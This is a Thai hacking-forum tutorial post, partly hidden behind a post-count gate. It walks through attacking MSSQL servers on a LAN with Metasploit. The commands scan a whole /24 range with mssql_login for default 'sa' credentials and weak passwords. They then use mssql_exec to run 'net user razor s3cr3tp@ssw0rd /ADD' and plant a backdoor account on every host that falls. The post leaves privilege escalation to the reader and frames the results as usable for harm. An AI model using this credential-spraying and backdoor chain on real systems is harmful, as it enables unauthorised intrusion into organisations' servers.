ก็ไม่ทราบว่าจะเหมือนกับ เรื่อง Attacking MSSQL with Metasploit ของที่ท่าน SheLLniX เขียนเอาไว้หรือเปล่านะครับ เพราะผมเอง post count ยังไม่ถึง 110 ตอนที่เขียนนี่ก็ 108 เองครับกดดูยังไม่ได้ แต่ก็เอาประสบการณ์ โดยตรงมาเขียนให้อ่านแล้วกันนะครับ ขอ hide ไว้ที่ 80 แล้วกันนะครับ เพราะ ถ้าเป็นเรื่องเดียวกัน ก็จะสมน้ำสมเนื้อ กัน หน่อย ก็เข้าเรื่องกันเลยนะครับ

[hide=80]สืบเนื่องมาจากได้ไปทำงาน ณ ที่แห่งหนึ่งมา แล้วต้องเจาะ ทั้งวงแลน วันนี้เลยจะเอามาเล่าถึง วิธีการเล็กๆ น้อยๆ
การใช้ Auxiliary ของ Metasploit ที่ชื่อว่า scanner/mssql/mssql_login
เป็น tools ตัวหนึ่งของ Metasploit โดย จะทำการ ยิง Username และ Password ที่เราต้องการแล้วดูว่า
มีเครื่องใดในวงแลนที่ทำการลง MSSQL แล้วไม่ได้เปลี่ยน username ที่เป็น sa กับ pass ที่เป็น password หรือ อื่นๆที่ง่ายๆ
อย่างเช่น sa ,admin ,admin123 , 1111,1234 อื่นๆ ที่ง่ายต่อการพิมพ์
.
.
มาเริ่มกันเลยดีกว่า สำหรับคนที่เคยใช้ metasploit คงไม่ต้องพูดมาก แค่เห็นก็คงพอจะรุ้ว่าต้องทำไร

use scanner/mssql/mssql_login
อยากรู้ว่ามันต้องการอะไรบ้าง ก็ show option
set RHOSTS 192.168.1.1/24
set MSSQL_PASS password
set THREADS 50
run

ตอนนี้มันก็จะไล่ยิงไปเลยทีละเครื่องในวง /24 ถ้าสำเร็จมันก็จะขึ้นว่า Success เราก็จำไอพีนั้นมา เพื่อทำชั่ว หรือ ทำดี ต่อ
ทีนี้เราก็มา ทำการ Add User เข้าไปที่เครื่องนั้นกัน ผ่านทาง MSSQL นั้นแหละ ด้วยการใช้

use admin/mssql/mssql_exec
อยากรู้ว่ามันต้องการอะไรบ้าง ก็ show option
set RHOSTS 192.168.1.1/24
set MSSQL_PASS password
set CMD net user razor s3cr3tp@ssw0rd /ADD
run

ถ้าสำเร็จมันก็จะขึ้นว่า Success ทีนี้ก็มีมี username razor อยู่ในเครื่องนั้นแล้ว แต่ว่าการจะ upgrade ตัวเองให้อยู่
ในกลุ่มของ Administrator ได้นั้น ทำอย่างไร ไปหากันต่อเองนะครับ ขอ สอนแค่นี้พอ ไป ลองเล่นแบบอื่นๆ ดูนะครับ
พลิกเพลงได้อีกเยอะ

comment : อย่าลืมนะครับ sa password เปลี่ยนซะนะครับ ถ้าคุณยังคงใช้อยู่ก็จะโดนแบบนี้

[/hide]

ใช้ให้ถูกทางนะครับ มันมีทั้งด้านดี และไม่ดี อยู่ที่คุณจะเลือกใช้